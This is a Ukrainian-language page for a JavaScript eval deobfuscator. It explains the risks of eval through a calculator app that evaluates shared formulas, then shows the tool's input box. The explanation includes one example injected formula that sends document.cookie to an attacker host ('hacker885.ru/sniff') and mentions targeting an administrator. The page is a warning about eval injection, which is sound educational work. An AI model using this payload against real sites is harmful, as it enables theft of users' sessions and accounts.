JavaScript деобфуcкатор функції eval

Наявність функції eval в JS може таїти небезпеку. Приклад. Oтримуєте json-дані зі стороннього сайту, і парсите, не JSON.parse а eval. Власник стороннього сайту не піклується про безпеку і зловмисник цим користується з усіма наслідками, що випливають (для Вас).
Припустимо, ми написали калькулятор в якому можна зареєструватися і обмінюватися формулами (тобто серверна частина де зберігаються як мінімум облікові дані користувачів). Мета атакуючого - отримання доступу до облікового запису користувачів, або адміністратора даного ресурсу.
Сам калькулятор працює так: при натисканні якої-небудь цифрової або з символом математичної операцій клавіші, ми додаємо його до рядка expr, і у нас є:

expr = '4 + 5 * 7';

Коли ми натискаємо знак "=" - то виконується eval:

var result = eval(expr);

Взлом: Якщо зловмисник відправить формулу де крім математичного вмісту буде код на javascript, то той, кому це буде відправлено, разом з формулою запустить і шкідливий скрипт. Формула, отримана від зловмисника, може виглядати так:
expr = '(document.createElement("img")).src ="http://hacker885.ru/sniff?c=" + document.cookie, 4 + 5 * 7'; В результаті: зловмисник зможе: отримати куки, доступ до local/session storage, до вмісту сторінки, спробує закачати що-небудь (вірус наприклад).
Плюс: Якщо таким шляхом ми відправимо це повідомлення до адміністратора ресурсу, то завдяки отриманим нами правам, можливо зможемо дістатися до бекенда ресурсу.
Тому до скриптів, які містять функцію eval треба відноситись обережно

Вставте тут ваш зашифрований код...

Розшифрувати

Ще не розкодовується? Натисніть кнопку Розшифрувати двічі !